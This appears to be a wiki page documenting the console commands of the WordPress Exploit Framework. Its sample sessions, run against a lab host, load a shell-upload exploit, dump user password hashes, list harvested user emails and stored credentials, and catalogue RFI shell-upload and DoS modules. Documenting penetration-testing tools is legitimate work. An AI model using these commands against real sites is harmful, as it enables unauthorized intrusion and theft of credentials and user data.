Supported Commands

Rob edited this page Aug 11, 2018 · 2 revisions

back

Changes the context of the session back to before loading the current module.

wpxf [exploit/shell/admin_shell_upload] > back
wpxf >

check

Check if the currently loaded module can be used against the specified target.

wpxf [exploit/shell/admin_shell_upload] > check

  [!] Target appears to be vulnerable

wpxf [exploit/shell/admin_shell_upload] >

clear

Clear the screen.

creds

List the credentials stored in the current workspace.

wpxf > creds

  ID   Host              Username   Password   Type
  --   ---------------   --------   --------   -----
  13   wordpress.vm:80   root       toor       plain
  14   wordpress.vm:80   test                  plain

wpxf >

creds -d [id]

Delete the credential with the matching [id] number.

wpxf > creds -d 8

  [+] Deleted credential 8

wpxf >

gset

Set an option value globally, so that the current module and all modules loaded afterwards will use the specified value for the specified option.

wpxf > gset host wordpress.vm

  [+] Globally set the value of host to wordpress.vm

wpxf > use exploit/shell/admin_shell_upload

  [+] Loaded module: #<Wpxf::Exploit::AdminShellUpload:0x3578af0>

wpxf [exploit/shell/admin_shell_upload] > show options

  Module options:

    Name                  Current Setting   Required   Description
    -------------------   ---------------   --------   -------------------------------------------
    host                  wordpress.vm      true       Address of the target host.
    http_client_timeout   5                 true       Max wait time in seconds for HTTP responses
    password                                true       The WordPress password to authenticate with
    port                  80                true       Port the remote host is listening on
    proxy                                   false      Proxy address ([protocol://]host:port)
    ssl                   false             true       Use SSL/HTTPS for all requests
    target_uri            /                 true       Base path to the WordPress application
    username                                true       The WordPress username to authenticate with
    verbose               false             true       Enable verbose output
    vhost                                   false      HTTP server virtual host

wpxf [exploit/shell/admin_shell_upload] >

gunset

Unset a global option set with the gset command.

wpxf > gunset host

  [+] Removed the global setting for host

wpxf >

info

Display information about the currently loaded module.

wpxf [exploit/shell/admin_shell_upload] > info

         Name: Admin Shell Upload
       Module: exploit/shell/admin_shell_upload
    Disclosed: 2015-02-21

  Provided by:
    rastating

  Module options:

    Name         Current Setting   Required   Description
    ----------   ---------------   --------   -------------------------------------------
    host         wordpress.vm      true       Address of the target host.
    password     toor              true       The WordPress password to authenticate with
    port         80                true       Port the remote host is listening on
    proxy                          false      Proxy address ([protocol://]host:port)
    ssl          false             true       Use SSL/HTTPS for all requests
    target_uri   /                 true       Base path to the WordPress application
    username     root              true       The WordPress username to authenticate with
    verbose      false             true       Enable verbose output
    vhost                          false      HTTP server virtual host

  Description:
    This module will generate a plugin, pack the payload into it and upload it to
    a server running WordPress; providing valid admin credentials are used.


wpxf [exploit/shell/admin_shell_upload] >

loot

List the loot collected from targets in the current workspace.

wpxf > loot

  ID   Host              Filename                  Notes                                   Type        
  --   ---------------   -----------------------   -------------------------------------   ---------   
  1    wordpress.vm:80   2018-07-14_15-00-56.csv   Registered users and e-mail addresses   user list   

  All filenames are relative to /home/rastating/.wpxf/loot

wpxf >

loot -d [id]

Delete the loot item with the matching [id] number.

wpxf > loot -d 1

  [+] Deleted item 1

wpxf >

loot -p [id]

Print the content of the loot item with the matching [id] number.

wpxf > loot -p 2

Email,Name
"lPBrOHC@mBeTjaAGGh.com","atgvrf"
"gSLzaYG@uZVUAeSJvj.com","dowzvc"
"AMfWgAH@uDNuULjBQv.com","efhkjv"
"halFIgH@CYqrzDzwQU.com","omquqt"
"root@wordpress.vm","root"

wpxf >

quit

Exit the WordPress Exploit Framework prompt.

rebuild_cache

Re-build the module cache.

wpxf > rebuild_cache

  [!] Refreshing the module cache...

wpxf >

run

Run the currently loaded module.

wpxf [auxiliary/hash_dump/simple_ads_manager_hash_dump] > run

  [-] Determining database prefix...
  [-] Dumping user hashes...

      Username   Hash
      --------   -----------------------------------
      root       $P$BqL7kZ\/A30CnAbIriSrXRmKvY9ynx80
      ATgVrF     $P$Bc5VwreNVctuXYwqKuN0IOWiDib79g.
      DOWzVC     $P$BwtOdeIGMW.jR7\/zfzMp.kc4FJcPwB.
      OmQUqt     $P$BOUcq9FWVxEyyrqyZNApW79kgPm7wq\/
      eFhkJv     $P$B1h9aF1cYdIBnAoh9F6NkchHXlTMpe.

  [+] Execution finished successfully

wpxf [auxiliary/hash_dump/simple_ads_manager_hash_dump] >

set

Set an option value for the currently loaded module.

wpxf [exploit/shell/admin_shell_upload] > set host wordpress.vm

  [+] Set host => wordpress.vm

wpxf [exploit/shell/admin_shell_upload] >

setg

Alias for gset

search

Search for modules that contain one or more of the specified keywords.

wpxf > search rfi

  [+] 3 Results for "rfi"

      Module                                               Title
      --------------------------------------------------   ----------------------------------------
      exploit/rfi/fast_image_adder_v1.1_rfi_shell_upload   Fast Image Adder <= 1.1 RFI Shell Upload
      exploit/rfi/flickr_picture_backup_rfi_shell_upload   Flickr Picture Backup RFI Shell Upload
      exploit/rfi/wp_mobile_detector_rfi_shell_upload      WP Mobile Detector RFI Shell Upload

wpxf >

show advanced

Show the advanced options of the currently loaded module.

wpxf [exploit/shell/admin_shell_upload] > show advanced

  Name: basic_auth_creds
  Current setting:
  Required: false
  Description: HTTP basic auth credentials (username:password)

  Name: follow_http_redirection
  Current setting: true
  Required: true
  Description: Automatically follow HTTP redirections

  Name: max_http_concurrency
  Current setting: 20
  Required: true
  Description: Max number of HTTP requests that can be made in parallel (Min: 1, Max: 200)

  Name: proxy_auth_creds
  Current setting:
  Required: false
  Description: Proxy server credentials (username:password)

  Name: user_agent
  Current setting: Mozilla/5.0 (Macintosh; U; U; Intel Mac OS X 10_7_6 rv:6.0; en-US) AppleWebKit/533.49.6 (KHTML, like Gecko) Version/4.0.2 Safari/533.49.6
  Required: false
  Description: The user agent string to send with all requests

  Name: verify_host
  Current setting: true
  Required: true
  Description: Enable host verification when using HTTPS

  Name: wp_content_dir
  Current setting: wp-content
  Required: true
  Description: The name of the wp-content directory.


wpxf [exploit/shell/admin_shell_upload] >

show auxiliary

Show the list of available auxiliary modules.

wpxf > show auxiliary

  [+] 58 Auxiliaries

      Module                                    Title                                                                              
      --------------------------------------    -----------------------------------------------------------   
      auxiliary/dos/load_scripts_dos            WordPress "load-scripts.php" DoS
      auxiliary/dos/long_password_dos           Long Password DoS
      auxiliary/dos/post_grid_file_deletion     Post Grid <= 2.0.12 Unauthenticated Arbitrary File Deletion
      auxiliary/dos/wp_v4.7.2_csrf_dos          WordPress 4.2-4.7.2 - CSRF DoS

  ...

  wpxf >

show exploits

Show the list of available exploits.

wpxf > show exploits

  [+] 289 Exploits

      Module                                                    Title
      --------------------------------------------------------  --------------------------------------------
      exploit/rfi/advanced_custom_fields_remote_file_inclusion  Advanced Custom Fields Remote File Inclusion
      exploit/rfi/fast_image_adder_v1.1_rfi_shell_upload        Fast Image Adder <= 1.1 RFI Shell Upload
      exploit/rfi/flickr_picture_backup_rfi_shell_upload        Flickr Picture Backup RFI Shell Upload
      exploit/rfi/gwolle_guestbook_remote_file_inclusion        Gwolle Guestbook Remote File Inclusion
      exploit/rfi/wp_mobile_detector_rfi_shell_upload           WP Mobile Detector RFI Shell Upload

...

wpxf >

show options

Show the basic options of the currently loaded module.

wpxf [exploit/shell/admin_shell_upload] > show options

  Module options:

    Name                  Current Setting   Required   Description
    -------------------   ---------------   --------   -------------------------------------------
    host                  wordpress.vm      true       Address of the target host.
    http_client_timeout   5                 true       Max wait time in seconds for HTTP responses
    password                                true       The WordPress password to authenticate with
    port                  80                true       Port the remote host is listening on
    proxy                                   false      Proxy address ([protocol://]host:port)
    ssl                   false             true       Use SSL/HTTPS for all requests
    target_uri            /                 true       Base path to the WordPress application
    username                                true       The WordPress username to authenticate with
    verbose               false             true       Enable verbose output
    vhost                                   false      HTTP server virtual host

wpxf [exploit/shell/admin_shell_upload] >

unset

Unset an option set with the set command.

wpxf [exploit/shell/admin_shell_upload] > unset host

  [+] Unset host

wpxf [exploit/shell/admin_shell_upload] >

unsetg

Alias for gunset

use

Load the specified module into the current context.

wpxf > use exploit/shell/admin_shell_upload

  [+] Loaded module: #<Wpxf::Exploit::AdminShellUpload:0x3af1100>

wpxf [exploit/shell/admin_shell_upload] >

workspace

List the available workspaces.

wpxf > workspace

  [-] default (active)
  [-] test

wpxf >

workspace [name]

Switch to the [name] workspace.

wpxf > workspace test

  [+] Switched to workspace: test

wpxf >

workspace -a [name]

Add a new workspace.

wpxf > workspace -a wiki

  [+] Added workspace: wiki

wpxf >

workspace -d [name]

Delete the [name] workspace.

wpxf > workspace -d wiki

  [+] Deleted workspace: wiki

wpxf >
You can’t perform that action at this time.
You signed in with another tab or window. Reload to refresh your session. You signed out in another tab or window. Reload to refresh your session.
Press h to open a hovercard with more details.